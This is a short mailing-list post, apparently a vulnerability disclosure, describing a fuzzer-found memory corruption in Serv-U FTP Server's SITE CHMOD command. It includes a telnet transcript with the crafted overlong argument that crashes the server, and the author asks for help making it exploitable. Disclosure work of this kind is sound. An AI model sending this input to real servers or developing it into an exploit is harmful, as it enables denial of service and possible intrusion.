Message-ID: <403137CE.8070306@bastart.eu.org>
From: maillist at bastart.eu.org (Some Guy)
Subject: Serv-U 4.1 Memory Corruption / Whatever

Well, I didn't have the time to fully analyze it yet, but by using a
fuzzer to check Serv-U, I found something that crashed it using bad data
in SITE CHMOD. This is not the already discovered vulnerability, cause it
can be used without write access, the crash occurs before permissions are
even checked. Seems like an off-by-two, cause you can control 2 bytes of
a dword where your buffer gets written, but I wasn't able to find how the
other 2 bytes are controlled yet, and I wasn't able to do anything useful
with the 2 bytes I have cause they can't be NULL. Well, I hope someone
can enlighten me a little, cause I tried the last 2 days and now I'm out
of ideas.

hello@...xy:~# telnet ftp.target.com 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER myuser
331 User name okay, need password.
PASS mypass
230 User logged in, proceed.
SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Connection closed by foreign host.
hello@...xy:~#

This will cause an access violation writing to 0x555551AD (UUQ-)

